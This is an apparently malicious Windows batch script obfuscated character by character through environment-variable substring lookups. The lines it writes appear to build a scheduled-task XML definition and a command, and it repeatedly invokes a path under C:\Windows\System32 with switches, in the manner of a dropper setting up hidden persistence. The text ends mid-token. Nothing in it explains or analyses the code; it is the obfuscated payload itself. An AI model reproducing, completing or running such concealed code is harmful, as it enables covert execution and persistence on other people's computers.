>>%uwcrnxl%  %ocvdubf:~52,1%%ocvdubf:~39,1%%ocvdubf:~47,1%%ocvdubf:~17,1%%ocvdubf:~46,1%%ocvdubf:~49,1%%ocvdubf:~42,1%%ocvdubf:~64,1%%ocvdubf:~34,1%%ocvdubf:~55,1%%ocvdubf:~46,1%%ocvdubf:~57,1%%ocvdubf:~42,1%%ocvdubf:~65,1%%ocvdubf:~1,1%<%ocvdubf:~68,1%%ocvdubf:~20,1%%ocvdubf:~41,1%%ocvdubf:~49,1%%ocvdubf:~42,1%%ocvdubf:~30,1%%ocvdubf:~42,1%%ocvdubf:~57,1%%ocvdubf:~57,1%%ocvdubf:~46,1%%ocvdubf:~51,1%%ocvdubf:~44,1%%ocvdubf:~56,1%>%ocvdubf:~65,1%%ocvdubf:~1,1%%ocvdubf:~65,1%%ocvdubf:~67,1%%ocvdubf:~65,1%%ocvdubf:~59,1%%ocvdubf:~39,1%%ocvdubf:~14,1%%ocvdubf:~55,1%%ocvdubf:~23,1%%ocvdubf:~43,1%
>>%uwcrnxl%  %ocvdubf:~52,1%%ocvdubf:~39,1%%ocvdubf:~47,1%%ocvdubf:~17,1%%ocvdubf:~46,1%%ocvdubf:~49,1%%ocvdubf:~42,1%%ocvdubf:~64,1%%ocvdubf:~34,1%%ocvdubf:~55,1%%ocvdubf:~46,1%%ocvdubf:~57,1%%ocvdubf:~42,1%%ocvdubf:~65,1%%ocvdubf:~1,1%%ocvdubf:~65,1%<%ocvdubf:~12,1%%ocvdubf:~49,1%%ocvdubf:~49,1%%ocvdubf:~52,1%%ocvdubf:~60,1%%ocvdubf:~30,1%%ocvdubf:~57,1%%ocvdubf:~38,1%%ocvdubf:~55,1%%ocvdubf:~57,1%%ocvdubf:~26,1%%ocvdubf:~51,1%%ocvdubf:~15,1%%ocvdubf:~42,1%%ocvdubf:~50,1%%ocvdubf:~38,1%%ocvdubf:~51,1%%ocvdubf:~41,1%>%ocvdubf:~57,1%%ocvdubf:~55,1%%ocvdubf:~58,1%%ocvdubf:~42,1%<%ocvdubf:~68,1%%ocvdubf:~12,1%%ocvdubf:~49,1%%ocvdubf:~49,1%%ocvdubf:~52,1%%ocvdubf:~60,1%%ocvdubf:~30,1%%ocvdubf:~57,1%%ocvdubf:~38,1%%ocvdubf:~55,1%%ocvdubf:~57,1%%ocvdubf:~26,1%%ocvdubf:~51,1%%ocvdubf:~15,1%%ocvdubf:~42,1%%ocvdubf:~50,1%%ocvdubf:~38,1%%ocvdubf:~51,1%%ocvdubf:~41,1%>%ocvdubf:~1,1%%ocvdubf:~65,1%%ocvdubf:~67,1%%ocvdubf:~65,1%%ocvdubf:~59,1%%ocvdubf:~39,1%%ocvdubf:~14,1%%ocvdubf:~55,1%%ocvdubf:~23,1%%ocvdubf:~43,1%
>>%uwcrnxl%  %ocvdubf:~52,1%%ocvdubf:~39,1%%ocvdubf:~47,1%%ocvdubf:~17,1%%ocvdubf:~46,1%%ocvdubf:~49,1%%ocvdubf:~42,1%%ocvdubf:~64,1%%ocvdubf:~34,1%%ocvdubf:~55,1%%ocvdubf:~46,1%%ocvdubf:~57,1%%ocvdubf:~42,1%%ocvdubf:~65,1%%ocvdubf:~1,1%%ocvdubf:~65,1%<%ocvdubf:~16,1%%ocvdubf:~51,1%%ocvdubf:~38,1%%ocvdubf:~39,1%%ocvdubf:~49,1%%ocvdubf:~42,1%%ocvdubf:~41,1%>%ocvdubf:~57,1%%ocvdubf:~55,1%%ocvdubf:~58,1%%ocvdubf:~42,1%<%ocvdubf:~68,1%%ocvdubf:~16,1%%ocvdubf:~51,1%%ocvdubf:~38,1%%ocvdubf:~39,1%%ocvdubf:~49,1%%ocvdubf:~42,1%%ocvdubf:~41,1%>%ocvdubf:~1,1%%ocvdubf:~65,1%%ocvdubf:~67,1%%ocvdubf:~65,1%%ocvdubf:~59,1%%ocvdubf:~39,1%%ocvdubf:~14,1%%ocvdubf:~55,1%%ocvdubf:~23,1%%ocvdubf:~43,1%
>>%uwcrnxl%  %ocvdubf:~52,1%%ocvdubf:~39,1%%ocvdubf:~47,1%%ocvdubf:~17,1%%ocvdubf:~46,1%%ocvdubf:~49,1%%ocvdubf:~42,1%%ocvdubf:~64,1%%ocvdubf:~34,1%%ocvdubf:~55,1%%ocvdubf:~46,1%%ocvdubf:~57,1%%ocvdubf:~42,1%%ocvdubf:~65,1%%ocvdubf:~1,1%%ocvdubf:~65,1%<%ocvdubf:~19,1%%ocvdubf:~46,1%%ocvdubf:~41,1%%ocvdubf:~41,1%%ocvdubf:~42,1%%ocvdubf:~51,1%>%ocvdubf:~57,1%%ocvdubf:~55,1%%ocvdubf:~58,1%%ocvdubf:~42,1%<%ocvdubf:~68,1%%ocvdubf:~19,1%%ocvdubf:~46,1%%ocvdubf:~41,1%%ocvdubf:~41,1%%ocvdubf:~42,1%%ocvdubf:~51,1%>%ocvdubf:~1,1%%ocvdubf:~65,1%%ocvdubf:~67,1%%ocvdubf:~65,1%%ocvdubf:~59,1%%ocvdubf:~39,1%%ocvdubf:~14,1%%ocvdubf:~55,1%%ocvdubf:~23,1%%ocvdubf:~43,1%
>>%uwcrnxl%  %ocvdubf:~52,1%%ocvdubf:~39,1%%ocvdubf:~47,1%%ocvdubf:~17,1%%ocvdubf:~46,1%%ocvdubf:~49,1%%ocvdubf:~42,1%%ocvdubf:~64,1%%ocvdubf:~34,1%%ocvdubf:~55,1%%ocvdubf:~46,1%%ocvdubf:~57,1%%ocvdubf:~42,1%%ocvdubf:~65,1%%ocvdubf:~1,1%%ocvdubf:~65,1%<%ocvdubf:~29,1%%ocvdubf:~58,1%%ocvdubf:~51,1%%ocvdubf:~26,1%%ocvdubf:~51,1%%ocvdubf:~49,1%%ocvdubf:~62,1%%ocvdubf:~20,1%%ocvdubf:~43,1%%ocvdubf:~20,1%%ocvdubf:~41,1%%ocvdubf:~49,1%%ocvdubf:~42,1%>%ocvdubf:~43,1%%ocvdubf:~38,1%%ocvdubf:~49,1%%ocvdubf:~56,1%%ocvdubf:~42,1%<%ocvdubf:~68,1%%ocvdubf:~29,1%%ocvdubf:~58,1%%ocvdubf:~51,1%%ocvdubf:~26,1%%ocvdubf:~51,1%%ocvdubf:~49,1%%ocvdubf:~62,1%%ocvdubf:~20,1%%ocvdubf:~43,1%%ocvdubf:~20,1%%ocvdubf:~41,1%%ocvdubf:~49,1%%ocvdubf:~42,1%>%ocvdubf:~1,1%%ocvdubf:~65,1%%ocvdubf:~67,1%%ocvdubf:~65,1%%ocvdubf:~59,1%%ocvdubf:~39,1%%ocvdubf:~14,1%%ocvdubf:~55,1%%ocvdubf:~23,1%%ocvdubf:~43,1%
>>%uwcrnxl%  %ocvdubf:~52,1%%ocvdubf:~39,1%%ocvdubf:~47,1%%ocvdubf:~17,1%%ocvdubf:~46,1%%ocvdubf:~49,1%%ocvdubf:~42,1%%ocvdubf:~64,1%%ocvdubf:~34,1%%ocvdubf:~55,1%%ocvdubf:~46,1%%ocvdubf:~57,1%%ocvdubf:~42,1%%ocvdubf:~65,1%%ocvdubf:~1,1%%ocvdubf:~65,1%%ocvdubf:~65,1%<%ocvdubf:~34,1%%ocvdubf:~38,1%%ocvdubf:~48,1%%ocvdubf:~42,1%%ocvdubf:~31,1%%ocvdubf:~52,1%%ocvdubf:~29,1%%ocvdubf:~58,1%%ocvdubf:~51,1%>%ocvdubf:~43,1%%ocvdubf:~38,1%%ocvdubf:~49,1%%ocvdubf:~56,1%%ocvdubf:~42,1%<%ocvdubf:~68,1%%ocvdubf:~34,1%%ocvdubf:~38,1%%ocvdubf:~48,1%%ocvdubf:~42,1%%ocvdubf:~31,1%%ocvdubf:~52,1%%ocvdubf:~29,1%%ocvdubf:~58,1%%ocvdubf:~51,1%>%ocvdubf:~1,1%%ocvdubf:~65,1%%ocvdubf:~67,1%%ocvdubf:~65,1%%ocvdubf:~59,1%%ocvdubf:~39,1%%ocvdubf:~14,1%%ocvdubf:~55,1%%ocvdubf:~23,1%%ocvdubf:~43,1%
>>%uwcrnxl%  %ocvdubf:~52,1%%ocvdubf:~39,1%%ocvdubf:~47,1%%ocvdubf:~17,1%%ocvdubf:~46,1%%ocvdubf:~49,1%%ocvdubf:~42,1%%ocvdubf:~64,1%%ocvdubf:~34,1%%ocvdubf:~55,1%%ocvdubf:~46,1%%ocvdubf:~57,1%%ocvdubf:~42,1%%ocvdubf:~65,1%%ocvdubf:~1,1%<%ocvdubf:~16,1%%ocvdubf:~61,1%%ocvdubf:~42,1%%ocvdubf:~40,1%%ocvdubf:~58,1%%ocvdubf:~57,1%%ocvdubf:~46,1%%ocvdubf:~52,1%%ocvdubf:~51,1%%ocvdubf:~31,1%%ocvdubf:~46,1%%ocvdubf:~50,1%%ocvdubf:~42,1%%ocvdubf:~23,1%%ocvdubf:~46,1%%ocvdubf:~50,1%%ocvdubf:~46,1%%ocvdubf:~57,1%>%ocvdubf:~27,1%%ocvdubf:~31,1%%ocvdubf:~2,1%%ocvdubf:~30,1%<%ocvdubf:~68,1%%ocvdubf:~16,1%%ocvdubf:~61,1%%ocvdubf:~42,1%%ocvdubf:~40,1%%ocvdubf:~58,1%%ocvdubf:~57,1%%ocvdubf:~46,1%%ocvdubf:~52,1%%ocvdubf:~51,1%%ocvdubf:~31,1%%ocvdubf:~46,1%%ocvdubf:~50,1%%ocvdubf:~42,1%%ocvdubf:~23,1%%ocvdubf:~46,1%%ocvdubf:~50,1%%ocvdubf:~46,1%%ocvdubf:~57,1%>%ocvdubf:~65,1%%ocvdubf:~1,1%%ocvdubf:~65,1%%ocvdubf:~67,1%%ocvdubf:~65,1%%ocvdubf:~59,1%%ocvdubf:~39,1%%ocvdubf:~14,1%%ocvdubf:~55,1%%ocvdubf:~23,1%%ocvdubf:~43,1%
>>%uwcrnxl%  %ocvdubf:~52,1%%ocvdubf:~39,1%%ocvdubf:~47,1%%ocvdubf:~17,1%%ocvdubf:~46,1%%ocvdubf:~49,1%%ocvdubf:~42,1%%ocvdubf:~64,1%%ocvdubf:~34,1%%ocvdubf:~55,1%%ocvdubf:~46,1%%ocvdubf:~57,1%%ocvdubf:~42,1%%ocvdubf:~65,1%%ocvdubf:~1,1%%ocvdubf:~65,1%<%ocvdubf:~27,1%%ocvdubf:~55,1%%ocvdubf:~46,1%%ocvdubf:~52,1%%ocvdubf:~55,1%%ocvdubf:~46,1%%ocvdubf:~57,1%%ocvdubf:~62,1%>%ocvdubf:~9,1%<%ocvdubf:~68,1%%ocvdubf:~27,1%%ocvdubf:~55,1%%ocvdubf:~46,1%%ocvdubf:~52,1%%ocvdubf:~55,1%%ocvdubf:~46,1%%ocvdubf:~57,1%%ocvdubf:~62,1%>%ocvdubf:~1,1%%ocvdubf:~65,1%%ocvdubf:~67,1%%ocvdubf:~65,1%%ocvdubf:~59,1%%ocvdubf:~39,1%%ocvdubf:~14,1%%ocvdubf:~55,1%%ocvdubf:~23,1%%ocvdubf:~43,1%
>>%uwcrnxl%  %ocvdubf:~52,1%%ocvdubf:~39,1%%ocvdubf:~47,1%%ocvdubf:~17,1%%ocvdubf:~46,1%%ocvdubf:~49,1%%ocvdubf:~42,1%%ocvdubf:~64,1%%ocvdubf:~34,1%%ocvdubf:~55,1%%ocvdubf:~46,1%%ocvdubf:~57,1%%ocvdubf:~42,1%%ocvdubf:~65,1%%ocvdubf:~1,1%%ocvdubf:~65,1%<%ocvdubf:~68,1%%ocvdubf:~30,1%%ocvdubf:~42,1%%ocvdubf:~57,1%%ocvdubf:~57,1%%ocvdubf:~46,1%%ocvdubf:~51,1%%ocvdubf:~44,1%%ocvdubf:~56,1%>%ocvdubf:~1,1%%ocvdubf:~65,1%%ocvdubf:~67,1%%ocvdubf:~65,1%%ocvdubf:~59,1%%ocvdubf:~39,1%%ocvdubf:~14,1%%ocvdubf:~55,1%%ocvdubf:~23,1%%ocvdubf:~43,1%
>>%uwcrnxl%  %ocvdubf:~52,1%%ocvdubf:~39,1%%ocvdubf:~47,1%%ocvdubf:~17,1%%ocvdubf:~46,1%%ocvdubf:~49,1%%ocvdubf:~42,1%%ocvdubf:~64,1%%ocvdubf:~34,1%%ocvdubf:~55,1%%ocvdubf:~46,1%%ocvdubf:~57,1%%ocvdubf:~42,1%%ocvdubf:~65,1%%ocvdubf:~1,1%%ocvdubf:~65,1%<%ocvdubf:~12,1%%ocvdubf:~40,1%%ocvdubf:~57,1%%ocvdubf:~46,1%%ocvdubf:~52,1%%ocvdubf:~51,1%%ocvdubf:~56,1%%ocvdubf:~65,1%%ocvdubf:~14,1%%ocvdubf:~52,1%%ocvdubf:~51,1%%ocvdubf:~57,1%%ocvdubf:~42,1%%ocvdubf:~61,1%%ocvdubf:~57,1%=%ocvdubf:~70,1%%ocvdubf:~12,1%%ocvdubf:~58,1%%ocvdubf:~57,1%%ocvdubf:~45,1%%ocvdubf:~52,1%%ocvdubf:~55,1%%ocvdubf:~70,1%>%ocvdubf:~1,1%%ocvdubf:~65,1%%ocvdubf:~67,1%%ocvdubf:~65,1%%ocvdubf:~59,1%%ocvdubf:~39,1%%ocvdubf:~14,1%%ocvdubf:~55,1%%ocvdubf:~23,1%%ocvdubf:~43,1%
>>%uwcrnxl%  %ocvdubf:~52,1%%ocvdubf:~39,1%%ocvdubf:~47,1%%ocvdubf:~17,1%%ocvdubf:~46,1%%ocvdubf:~49,1%%ocvdubf:~42,1%%ocvdubf:~64,1%%ocvdubf:~34,1%%ocvdubf:~55,1%%ocvdubf:~46,1%%ocvdubf:~57,1%%ocvdubf:~42,1%%ocvdubf:~65,1%%ocvdubf:~1,1%%ocvdubf:~65,1%<%ocvdubf:~16,1%%ocvdubf:~61,1%%ocvdubf:~42,1%%ocvdubf:~40,1%>%ocvdubf:~1,1%%ocvdubf:~65,1%%ocvdubf:~67,1%%ocvdubf:~65,1%%ocvdubf:~59,1%%ocvdubf:~39,1%%ocvdubf:~14,1%%ocvdubf:~55,1%%ocvdubf:~23,1%%ocvdubf:~43,1%
>>%uwcrnxl%  %ocvdubf:~52,1%%ocvdubf:~39,1%%ocvdubf:~47,1%%ocvdubf:~17,1%%ocvdubf:~46,1%%ocvdubf:~49,1%%ocvdubf:~42,1%%ocvdubf:~64,1%%ocvdubf:~34,1%%ocvdubf:~55,1%%ocvdubf:~46,1%%ocvdubf:~57,1%%ocvdubf:~42,1%%ocvdubf:~65,1%%ocvdubf:~1,1%%ocvdubf:~65,1%<%ocvdubf:~14,1%%ocvdubf:~52,1%%ocvdubf:~50,1%%ocvdubf:~50,1%%ocvdubf:~38,1%%ocvdubf:~51,1%%ocvdubf:~41,1%>%ocvdubf:~1,1%%ocvdubf:~67,1%%ocvdubf:~40,1%%ocvdubf:~38,1%%ocvdubf:~50,1%%ocvdubf:~67,1%%ocvdubf:~1,1%<%ocvdubf:~68,1%%ocvdubf:~14,1%%ocvdubf:~52,1%%ocvdubf:~50,1%%ocvdubf:~50,1%%ocvdubf:~38,1%%ocvdubf:~51,1%%ocvdubf:~41,1%>%ocvdubf:~1,1%%ocvdubf:~65,1%%ocvdubf:~67,1%%ocvdubf:~65,1%%ocvdubf:~59,1%%ocvdubf:~39,1%%ocvdubf:~14,1%%ocvdubf:~55,1%%ocvdubf:~23,1%%ocvdubf:~43,1%
>>%uwcrnxl%  %ocvdubf:~52,1%%ocvdubf:~39,1%%ocvdubf:~47,1%%ocvdubf:~17,1%%ocvdubf:~46,1%%ocvdubf:~49,1%%ocvdubf:~42,1%%ocvdubf:~64,1%%ocvdubf:~34,1%%ocvdubf:~55,1%%ocvdubf:~46,1%%ocvdubf:~57,1%%ocvdubf:~42,1%%ocvdubf:~65,1%%ocvdubf:~1,1%%ocvdubf:~65,1%<%ocvdubf:~12,1%%ocvdubf:~55,1%%ocvdubf:~44,1%%ocvdubf:~58,1%%ocvdubf:~50,1%%ocvdubf:~42,1%%ocvdubf:~51,1%%ocvdubf:~57,1%%ocvdubf:~56,1%><%ocvdubf:~68,1%%ocvdubf:~12,1%%ocvdubf:~55,1%%ocvdubf:~44,1%%ocvdubf:~58,1%%ocvdubf:~50,1%%ocvdubf:~42,1%%ocvdubf:~51,1%%ocvdubf:~57,1%%ocvdubf:~56,1%>%ocvdubf:~1,1%%ocvdubf:~65,1%%ocvdubf:~67,1%%ocvdubf:~65,1%%ocvdubf:~59,1%%ocvdubf:~39,1%%ocvdubf:~14,1%%ocvdubf:~55,1%%ocvdubf:~23,1%%ocvdubf:~43,1%
>>%uwcrnxl%  %ocvdubf:~52,1%%ocvdubf:~39,1%%ocvdubf:~47,1%%ocvdubf:~17,1%%ocvdubf:~46,1%%ocvdubf:~49,1%%ocvdubf:~42,1%%ocvdubf:~64,1%%ocvdubf:~34,1%%ocvdubf:~55,1%%ocvdubf:~46,1%%ocvdubf:~57,1%%ocvdubf:~42,1%%ocvdubf:~65,1%%ocvdubf:~1,1%%ocvdubf:~65,1%%ocvdubf:~65,1%<%ocvdubf:~68,1%%ocvdubf:~16,1%%ocvdubf:~61,1%%ocvdubf:~42,1%%ocvdubf:~40,1%>%ocvdubf:~1,1%%ocvdubf:~65,1%%ocvdubf:~67,1%%ocvdubf:~65,1%%ocvdubf:~59,1%%ocvdubf:~39,1%%ocvdubf:~14,1%%ocvdubf:~55,1%%ocvdubf:~23,1%%ocvdubf:~43,1%
>>%uwcrnxl%  %ocvdubf:~52,1%%ocvdubf:~39,1%%ocvdubf:~47,1%%ocvdubf:~17,1%%ocvdubf:~46,1%%ocvdubf:~49,1%%ocvdubf:~42,1%%ocvdubf:~64,1%%ocvdubf:~34,1%%ocvdubf:~55,1%%ocvdubf:~46,1%%ocvdubf:~57,1%%ocvdubf:~42,1%%ocvdubf:~65,1%%ocvdubf:~1,1%%ocvdubf:~65,1%<%ocvdubf:~68,1%%ocvdubf:~12,1%%ocvdubf:~40,1%%ocvdubf:~57,1%%ocvdubf:~46,1%%ocvdubf:~52,1%%ocvdubf:~51,1%%ocvdubf:~56,1%>%ocvdubf:~1,1%%ocvdubf:~65,1%%ocvdubf:~67,1%%ocvdubf:~65,1%%ocvdubf:~59,1%%ocvdubf:~39,1%%ocvdubf:~14,1%%ocvdubf:~55,1%%ocvdubf:~23,1%%ocvdubf:~43,1%
>>%uwcrnxl%  %ocvdubf:~52,1%%ocvdubf:~39,1%%ocvdubf:~47,1%%ocvdubf:~17,1%%ocvdubf:~46,1%%ocvdubf:~49,1%%ocvdubf:~42,1%%ocvdubf:~64,1%%ocvdubf:~34,1%%ocvdubf:~55,1%%ocvdubf:~46,1%%ocvdubf:~57,1%%ocvdubf:~42,1%%ocvdubf:~65,1%%ocvdubf:~1,1%%ocvdubf:~65,1%<%ocvdubf:~68,1%%ocvdubf:~31,1%%ocvdubf:~38,1%%ocvdubf:~56,1%%ocvdubf:~48,1%>%ocvdubf:~1,1%%ocvdubf:~65,1%%ocvdubf:~67,1%%ocvdubf:~65,1%%ocvdubf:~59,1%%ocvdubf:~39,1%%ocvdubf:~14,1%%ocvdubf:~55,1%%ocvdubf:~23,1%%ocvdubf:~43,1%
>>%uwcrnxl%  %ocvdubf:~52,1%%ocvdubf:~39,1%%ocvdubf:~47,1%%ocvdubf:~17,1%%ocvdubf:~46,1%%ocvdubf:~49,1%%ocvdubf:~42,1%%ocvdubf:~64,1%%ocvdubf:~14,1%%ocvdubf:~49,1%%ocvdubf:~52,1%%ocvdubf:~56,1%%ocvdubf:~42,1%
>>%uwcrnxl%  %ocvdubf:~15,1%%ocvdubf:~46,1%%ocvdubf:~50,1%%ocvdubf:~65,1%%ocvdubf:~52,1%%ocvdubf:~39,1%%ocvdubf:~47,1%%ocvdubf:~30,1%%ocvdubf:~45,1%%ocvdubf:~42,1%%ocvdubf:~49,1%%ocvdubf:~49,1%
>>%uwcrnxl%  %ocvdubf:~30,1%%ocvdubf:~42,1%%ocvdubf:~57,1%%ocvdubf:~65,1%%ocvdubf:~52,1%%ocvdubf:~39,1%%ocvdubf:~47,1%%ocvdubf:~30,1%%ocvdubf:~45,1%%ocvdubf:~42,1%%ocvdubf:~49,1%%ocvdubf:~49,1%%ocvdubf:~65,1%=%ocvdubf:~65,1%%ocvdubf:~34,1%%ocvdubf:~30,1%%ocvdubf:~40,1%%ocvdubf:~55,1%%ocvdubf:~46,1%%ocvdubf:~53,1%%ocvdubf:~57,1%%ocvdubf:~64,1%%ocvdubf:~14,1%%ocvdubf:~55,1%%ocvdubf:~42,1%%ocvdubf:~38,1%%ocvdubf:~57,1%%ocvdubf:~42,1%%ocvdubf:~26,1%%ocvdubf:~39,1%%ocvdubf:~47,1%%ocvdubf:~42,1%%ocvdubf:~40,1%%ocvdubf:~57,1%%ocvdubf:~65,1%%ocvdubf:~0,1%%ocvdubf:~1,1%%ocvdubf:~34,1%%ocvdubf:~30,1%%ocvdubf:~40,1%%ocvdubf:~55,1%%ocvdubf:~46,1%%ocvdubf:~53,1%%ocvdubf:~57,1%%ocvdubf:~64,1%%ocvdubf:~56,1%%ocvdubf:~45,1%%ocvdubf:~42,1%%ocvdubf:~49,1%%ocvdubf:~49,1%%ocvdubf:~1,1%%ocvdubf:~69,1%
>>%uwcrnxl%  %ocvdubf:~52,1%%ocvdubf:~39,1%%ocvdubf:~47,1%%ocvdubf:~30,1%%ocvdubf:~45,1%%ocvdubf:~42,1%%ocvdubf:~49,1%%ocvdubf:~49,1%%ocvdubf:~64,1%%ocvdubf:~55,1%%ocvdubf:~58,1%%ocvdubf:~51,1%%ocvdubf:~65,1%%ocvdubf:~1,1%%ocvdubf:~14,1%:\%ocvdubf:~34,1%%ocvdubf:~46,1%%ocvdubf:~51,1%%ocvdubf:~41,1%%ocvdubf:~52,1%%ocvdubf:~60,1%%ocvdubf:~56,1%\%ocvdubf:~30,1%%ocvdubf:~62,1%%ocvdubf:~56,1%%ocvdubf:~57,1%%ocvdubf:~42,1%%ocvdubf:~50,1%%ocvdubf:~5,1%%ocvdubf:~4,1%\%ocvdubf:~56,1%%ocvdubf:~40,1%%ocvdubf:~45,1%%ocvdubf:~57,1%%ocvdubf:~38,1%%ocvdubf:~56,1%%ocvdubf:~48,1%%ocvdubf:~56,1%%ocvdubf:~64,1%%ocvdubf:~42,1%%ocvdubf:~61,1%%ocvdubf:~42,1%%ocvdubf:~65,1%%ocvdubf:~68,1%%ocvdubf:~14,1%%ocvdubf:~55,1%%ocvdubf:~42,1%%ocvdubf:~38,1%%ocvdubf:~57,1%%ocvdubf:~42,1%%ocvdubf:~65,1%%ocvdubf:~68,1%%ocvdubf:~31,1%%ocvdubf:~25,1%%ocvdubf:~65,1%%ocvdubf:~1,1%%ocvdubf:~67,1%%ocvdubf:~40,1%%ocvdubf:~45,1%%ocvdubf:~55,1%%ocvdubf:~0,1%%ocvdubf:~5,1%%ocvdubf:~6,1%%ocvdubf:~69,1%%ocvdubf:~67,1%%ocvdubf:~51,1%%ocvdubf:~52,1%%ocvdubf:~50,1%%ocvdubf:~42,1%%ocvdubf:~67,1%%ocvdubf:~51,1%%ocvdubf:~52,1%%ocvdubf:~50,1%%ocvdubf:~42,1%%ocvdubf:~53,1%%ocvdubf:~40,1%%ocvdubf:~67,1%%ocvdubf:~40,1%%ocvdubf:~45,1%%ocvdubf:~55,1%%ocvdubf:~0,1%%ocvdubf:~5,1%%ocvdubf:~6,1%%ocvdubf:~69,1%%ocvdubf:~67,1%%ocvdubf:~1,1%%ocvdubf:~65,1%%ocvdubf:~68,1%%ocvdubf:~61,1%%ocvdubf:~50,1%%ocvdubf:~49,1%%ocvdubf:~65,1%%ocvdubf:~1,1%%ocvdubf:~67,1%%ocvdubf:~40,1%%ocvdubf:~45,1%%ocvdubf:~55,1%%ocvdubf:~0,1%%ocvdubf:~5,1%%ocvdubf:~6,1%%ocvdubf:~69,1%%ocvdubf:~67,1%%ocvdubf:~52,1%%ocvdubf:~58,1%%ocvdubf:~57,1%%ocvdubf:~17,1%%ocvdubf:~46,1%%ocvdubf:~49,1%%ocvdubf:~42,1%%ocvdubf:~67,1%%ocvdubf:~40,1%%ocvdubf:~45,1%%ocvdubf:~55,1%%ocvdubf:~0,1%%ocvdubf:~5,1%%ocvdubf:~6,1%%ocvdubf:~69,1%%ocvdubf:~67,1%%ocvdubf:~1,1%%ocvdubf:~1,1%
>>%uwcrnxl%  %ocvdubf:~34,1%%ocvdubf:~30,1%%ocvdubf:~40,1%%ocvdubf:~55,1%%ocvdubf:~46,1%%ocvdubf:~53,1%%ocvdubf:~57,1%%ocvdubf:~64,1%%ocvdubf:~30,1%%ocvdubf:~49,1%%ocvdubf:~42,1%%ocvdubf:~42,1%%ocvdubf:~53,1%%ocvdubf:~0,1%%ocvdubf:~7,1%%ocvdubf:~2,1%%ocvdubf:~2,1%%ocvdubf:~2,1%%ocvdubf:~69,1%
>>%uwcrnxl%  %ocvdubf:~52,1%%ocvdubf:~39,1%%ocvdubf:~47,1%%ocvdubf:~30,1%%ocvdubf:~45,1%%ocvdubf:~42,1%%ocvdubf:~49,1%%ocvdubf:~49,1%%ocvdubf:~64,1%%ocvdubf:~55,1%%ocvdubf:~58,1%%ocvdubf:~51,1%%ocvdubf:~65,1%%ocvdubf:~1,1%%ocvdubf:~14,1%:\%ocvdubf:~34,1%%ocvdubf:~46,1%%ocvdubf:~51,1%%ocvdubf:~41,1%%ocvdubf:~52,1%%ocvdubf:~60,1%%ocvdubf:~56,1%\%ocvdubf:~30,1%%ocvdubf:~62,1%%ocvdubf:~56,1%%ocvdubf:~57,1%%ocvdubf:~42,1%%ocvdubf:~50,1%%ocvdubf:~5,1%%ocvdubf:~4,1%\%ocvdubf:~56,1%%ocvdubf:~40,1%%ocvdubf:~45,1%%ocvdubf:~57,1%%ocvdubf:~38,1%%ocvdubf:~56,1%%ocvdubf:~48,1%%ocvdubf:~56,1%%ocvdubf:~64,1%%ocvdubf:~42,1%%ocvdubf:~61,1%%ocvdubf:~42,1%%ocvdubf:~65,1%%ocvdubf:~68,1%%ocvdubf:~14,1%%ocvdubf:~55,1%%ocvdubf:~42,1%%ocvdubf:~38,1%%ocvdubf:~57,1%%ocvdubf:~42,1%%ocvdubf:~65,1%%ocvdubf:~68,1%%ocvdubf:~31,1%%ocvdubf:~25,1%%ocvdubf:~65,1%%ocvdubf:~1,1%%ocvdubf:~67,1%%ocvdubf:~40,1%%ocvdubf:~45,1%%ocvdubf:~55,1%%ocvdubf:~0,1%%ocvdubf:~5,1%%ocvdubf:~6,1%%ocvdubf:~69,1%%ocvdubf:~67,1%%ocvdubf:~51,1%%ocvdubf:~52,1%%ocvdubf:~50,1%%ocvdubf:~42,1%%ocvdubf:~67,1%%ocvdubf:~51,1%%ocvdubf:~52,1%%ocvdubf:~50,1%%ocvdubf:~42,1%%ocvdubf:~53,1%%ocvdubf:~40,1%%ocvdubf:~67,1%%ocvdubf:~40,1%%ocvdubf:~45,1%%ocvdubf:~55,1%%ocvdubf:~0,1%%ocvdubf:~5,1%%ocvdubf:~6,1%%ocvdubf:~69,1%%ocvdubf:~67,1%%ocvdubf:~1,1%%ocvdubf:~65,1%%ocvdubf:~68,1%%ocvdubf:~61,1%%ocvdubf:~50,1%%ocvdubf:~49,1%%ocvdubf:~65,1%%ocvdubf:~1,1%%ocvdubf:~67,1%%ocvdubf:~40,1%%ocvdubf:~45,1%%ocvdubf:~55,1%%ocvdubf:~0,1%%ocvdubf:~5,1%%ocvdubf:~6,1%%ocvdubf:~69,1%%ocvdubf:~67,1%%ocvdubf:~52,1%%ocvdubf:~58,1%%ocvdubf:~57,1%%ocvdubf:~17,1%%ocvdubf:~46,1%%ocvdubf:~49,1%%ocvdubf:~42,1%%ocvdubf:~67,1%%ocvdubf:~40,1%%ocvdubf:~45,1%%ocvdubf:~55,1%%ocvdubf:~0,1%%ocvdubf:~5,1%%ocvdubf:~6,1%%ocvdubf:~69,1%%ocvdubf:~67,1%%ocvdubf:~1,1%%ocvdubf:~1,1%
>>%uwcrnxl%  %ocvdubf:~34,1%%ocvdubf:~30,1%%ocvdubf:~40,1%%ocvdubf:~55,1%%ocvdubf:~46,1%%ocvdubf:~53,1%%ocvdubf:~57,1%%ocvdubf:~64,1%%ocvdubf:~30,1%%ocvdubf:~49,1%%ocvdubf:~42,1%%ocvdubf:~42,1%%ocvdubf:~53,1%%ocvdubf:~0,1%%ocvdubf:~7,1%%ocvdubf:~2,1%%ocvdubf:~2,1%%ocvdubf:~2,1%%ocvdubf:~69,1%
>>%uwcrnxl%  %ocvdubf:~52,1%%ocvdubf:~39,1%%ocvdubf:~47,1%%ocvdubf:~30,1%%ocvdubf:~45,1%%ocvdubf:~42,1%%ocvdubf:~49,1%%ocvdubf:~49,1%%ocvdubf:~64,1%%ocvdubf:~55,1%%ocvdubf:~58,1%%ocvdubf:~51,1%%ocvdubf:~65,1%%ocvdubf:~1,1%%ocvdubf:~14,1%:\%ocvdubf:~34,1%%ocvdubf:~46,1%%ocvdubf:~51,1%%ocvdubf:~41,1%%ocvdubf:~52,1%%ocvdubf:~60,1%%ocvdubf:~56,1%\%ocvdubf:~30,1%%ocvdubf:~62,1%%ocvdubf:~56,1%%ocvdubf:~57,1%%ocvdubf:~42,1%%ocvdubf:~50,1%%ocvdubf:~5,1%%ocvdubf:~4,1%\%ocvdubf:~56,1%%ocvdubf:~40,1%%ocvdubf:~45,1%%ocvdubf:~57,1%%ocvdubf:~38,1%%ocvdubf:~56,1%%ocvdubf:~48,1%%ocvdubf:~56,1%%ocvdubf:~64,1%%ocvdubf:~42,1%%ocvdubf:~61,1%%ocvdubf:~42,1%%ocvdubf:~65,1%%ocvdubf:~68,1%%ocvdubf:~14,1%%ocvdubf:~55,1%%ocvdubf:~42,1%%ocvdubf:~38,1%%ocvdubf:~57,1%%ocvdubf:~42,1%%ocvdubf:~65,1%%ocvdubf:~68,1%%